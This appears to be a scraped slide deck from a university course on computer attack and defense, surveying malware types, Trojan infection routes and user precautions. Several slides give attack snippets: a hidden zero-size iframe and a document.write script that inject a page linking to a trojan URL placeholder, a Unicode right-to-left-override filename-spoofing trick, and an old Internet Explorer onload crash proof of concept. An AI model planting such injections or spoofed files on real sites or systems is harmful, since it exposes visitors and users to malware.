900 likes | 1.1k Views
The Attack and Defense of Computers Dr. 許 富 皓. Malware. Malicious Software (Malware):. Security tools and toolkits Back doors (trap doors) Logic bombs Viruses Worms Binders Droppers Trojan Horses Bacteria or rabbit programs. Spyware Rootkit URL Injection Dialers ….
E N D
The Attack and Defense of Computers Dr.許 富 皓
Malicious Software (Malware): • Security tools and toolkits • Back doors (trap doors) • Logic bombs • Viruses • Worms • Binders • Droppers • Trojan Horses • Bacteria or rabbit programs. • Spyware • Rootkit • URL Injection • Dialers • …
Security Tools and toolkits • Automatically scan for computer security weaknesses. • Can be used by both security professionals and attackers. • e.g. Nessus, COPS, ISS, Tiger, … and so on. • Unwittingly release reports to the public • There are also programs and tool sets whose only function is to attack computers. • Script kids • P.S. These tools may damage the systems that install them or may contain booby-trap that will compromise the systems that install them.
Logic Bombs • A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. • For example, a programmer may hide a piece of code that starts deleting files, should he ever leave the company (and the salary database). • Usually written by inner programmers.
Logic Bombs and Viruses and Worms • Software that is inherently malicious, such as viruses and worms, often contain logic bombs that execute a certain payload • at a pre-defined time or • when some other condition is met. • Many viruses attack their host systems on specific dates, such as Friday the 13th or April Fool's Day. • Trojans that activate on certain dates are often called "time bombs".
Key Logger • A program or hardware device that captures every key depression on the computer. • Also known as "Keystroke Cops," they are used to monitor a user's activities by recording every keystroke the user makes, including typos, backspacing, and retyping.
Security Concerns about Key Loggers • Keystroke logging can be achieved by both hardware and software means. • There is no easy way to prevent keylogging software being installed on your PC, as it is usually done by a method of stealth. • If you are using a home PC, then it is likely to be free on any keystroke logging hardware (but remember there may be keystroke logging software).
Precautions against Key Loggers • Try and avoid typing private details on public PCs, • Always try and avoid visiting sites on public PCs that require you to enter your login details, e.g. an online banking account.
Example • Ardamax Keylogger[1][2]
Dialers • A program that • replaces the phone number in a modern’s dial-up connection with a long distance number, often out of the country, in order to run up phone charges on pay-per-dial numbers • dials out at night to send keylogger or other information to an attacker.
URL Injection • Change the URL submitted to a server belonging to some or all domains.
Bacteria and Rabbits • Bacteria (also known as rabbit programs) are a type of malware that create many instances of themselves in order to consume large amounts of system resources. • Bacteria create a denial of service effect as legitimate programs may no longer be able to run, or at least may not run properly.
Definition of Binder • A tool that combines two or more files into a single file, usually for the purpose of hiding one of them. • A binder compiles the list of files that you select into one host file, which you can rename. • A host file is a simple custom compiled program that will decompress and launch the embedded programs. • When you start the host, the embedded files in it are automatically decompressed and launched.
Example • When a piece of malware is bound with Notepad, for instance, the result will appear to be Notepad, and appear to run like Notepad, but the piece of malware will also be run.
Program • YAB: Yet Another Binder • User Guide
Embedded Files • The files embedded in a host file is not always binary file. It can be a file of any type. • Even an embedded file is a binary file, it may be a normal program.
Definition of a Dropper • A dropper is a program (malware component) that has been designed to "install" some sort of malware (virus, backdoor, etc) to a target system. • Single stage: the malware code can be contained within the dropper in such a way as to avoid detection by virus scanners • Two stages: the dropper may download the malware to the target machine once activated
Types of Droppers • Depending on how a dropper is executed, there are two major types of droppers: • those that do not require user interaction • perform through the exploitation of a system by some vulnerability • those that require user interaction by convincing the user that it is some legitimate or benign program.
Examples • 8sec!Trojan
Trojan Horse • In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded withinlegitimate software. • Trojans use false and fake names to trick users into executing them. • These strategies are often collectively termed social engineering. • A Trojan is designed to operate with functions unknown to the victim. • The useful, or seemingly useful, functions serve as camouflage for these undesired functions.
Properties of Trojan Horses • Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like worms. • Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, • Trojan horse programs depend on actions by the intended victims • if Trojans replicate and even distribute themselves, each new victim must run the program/Trojan. • Due to the above reasons Trojan horses’ virulence depends on • successful implementation of social engineering concepts but doesn’t depend on • the flaws in a computer system's security design or configuration.
Categories of Trojan Horses • There are two common types of Trojan horses: • a useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. • Examples include various implementations of • weather alerting programs • computer clock setting software • peer to peer file sharing utilities. • a standalone program that masquerades as something else, like a game or image file (e.g. firework.jpg.exe in Windows.
Malware Parasitizes inside Trojan Horses • In practice, Trojan Horses in the wild often contain: • spying functions (such as a packet sniffer) • backdoor functions that allow a computer, unbeknownst to the owner, to be remotely controlled from the network, creating a zombie computer. • The Sony/BMGrootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. • Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.
Example of a Simple Trojan Horse • A simple example of a Trojan horse would be a program named waterfalls.jpg.exe claiming to be a free waterfall picture which, when run, instead begins erasing all the files on the computer.
E-Mail Trojan Horses • On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. • The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. • Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse has an extension that might be "masked" by giving it a name such as Readme.txt.exe. • With file extensions hidden, the user would only see Readme.txt and could mistake it for a harmless text file. • Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.
Unicode控制字元202E副檔名欺騙[劉昱賢][1] • 該手法係利用作業系統解讀檔案名稱時,若遇到Unicode控制字元,會改變檔案名稱的顯示方式進行攻擊。attacker可以在檔案名稱中,插入特定的Unicode控制字元,導致作業系統在顯示該檔案名稱時,誤導使用者。大師兄[202E]gpj.exe • 其中括號內為Unicode控制字元202E,該控制碼為不可視字元,可控制後續字元由右至左顯示(Right To Left Override)。當作業系統解譯與顯示檔案名稱時,會將其顯示為: 大師兄exe.jpg real filename displayed filename
Commonly Used Methods of Infection • Websites. • E-mails. • Downloaded Files.
Websites • You can be infected by visiting a rogue website. • Internet Explorer is most often targeted by makers of Trojans and other pests, because it contains many bugs. • Some of the bugs improperly handle data (such as HTML or images) by executing it as a legitimate program. • Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.
Features vs. Risks • The more "features" a web browser has, the higher your risk of having security holes that can be exploited by a Trojan horse. • for example • ActiveX objects, • some older versions of Flash • Java
Example 1: MicrosoftIEwindow() Arbitrary Code Execution Vulnerability [Secunia] • The vulnerability is caused due to certain objects not being initialized correctly when the window() function is used in conjunction with the <body onload> event. • This can be exploited to execute arbitrary code on a vulnerable browser via some specially crafted JavaScript code called directly when a site has been loaded.Example:<body onload="window();">Successful exploitation requires that the user is e.g. tricked into visiting a malicious website. • PROOF OF CONCEPT
<body onLoad= …>[HTML Code Tutorial] • The browser triggers onLoad when the document is finished loading. • The contents of onLoad is one or more JavaScript commands. • So, for example, the following <BODY ...> tag tells the browser to bring up an alert box once the page is completely loaded: <BODY onLoad="alert('hello world!')">
MS IE - Crash on JavaScript window()- calling (1) • There is a bug in MicrosoftInternet Explorer, which causes a crash in it. • The bug occurs, because Microsoft Internet Explorer can't handle a call to a JavaScript-function with the name of the "window"-object. An object used in Javascript.
MS IE - Crash on JavaScript window()- calling (2) [symantic] • Internet Explorer fails to properly initialize the JavaScript `Window()' function. When the 'onLoad' handler is set to call the improperly initialized `Window()' function, the Web browser attempts to call the address 0x006F005B, which is derived from the Unicode representation of 'OBJECT'. CALL DWORD [ECX+8] • It is shown that JavaScript prompt boxes can be used by attackers to fill the memory region at 0x00600000 with attacker-supplied data, allowing executable machine code to be placed into the required address space. • Crash, if pointing to non-code. • Execution, if pointing to code.
Dangerous Web Site • The web site pointed by the following URL is one containing the trap described in the previous slides. • HTTP MSIE JavaScript OnLoad Rte CodeExec [symantic] http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
Example 2: Trojan Horse Exploits Image Flaw [Declan McCullagh et al.] • EasyNews, a provider of Usenet newsgroups, said it has identified two JPEG images that take advantage of a previously identified flaw ( a heap-based buffer overflow [Michael Cobb] ) in the way Microsoft software handles graphics files. • Windows users could have their computers infected merely by opening one of those Trojan horse images. • Attackers tried to use these JPEGs to download Trojan (horse programs) to vulnerable computers.
Example 3: Comprise a Web Server and Add Hidden Download Instructions in Web Pages (網站掛馬) • Create frame with size 0.
通常被利用 • [ 弱點] • [ SQL Injection ] 等 手法掛馬後,會在該網頁的[ 第一行或最後一行中 ]出現[ 相關被掛馬語法 ].
框架 (iframe) 掛馬 • 以下是部份語法: • <iframe src=木馬網址 width=0 height=0></iframe>
JScript 文件掛馬 • 首先將以下語法存檔為xxx.js document.write("<iframe width='0' height='0' src='木馬網址'></iframe>"); • 然後將此文件的URL利用各種方式上傳到目標處。 • For example, • JScript 掛馬的語法為: <script language=javascript src=xxx.js></script>
Emails and Trojan Horses • The majority of Trojan horse infections occur because the user was tricked into running an infected program. • This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a Trojan or virus.
Microsoft Outlook • If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. • The same vulnerabilities exist since Outlook • allows email to contain HTML and images and • actually uses much of the same code to process these as Internet Explorer.
Downloaded Files • The infected program doesn't have to arrive via email, though; it can be • sent to you in an Instant Message • downloaded from a Web site or by FTP • delivered on a CD or floppy disk
Precautions against Trojan Horses (1) • Trojan Horses are commonly spread through an e-mail, much like other types of common viruses. • The best ways to protect yourself and your company from Trojan Horses are as follows: • If you receive e-mail from someone that you do not know or you receive an unknown attachment never open it right away. • As an e-mail user you should confirm the source. • P.S.: Some hackers have the ability to steal an address books so if you see e-mail from someone you know that does not necessarily make it safe.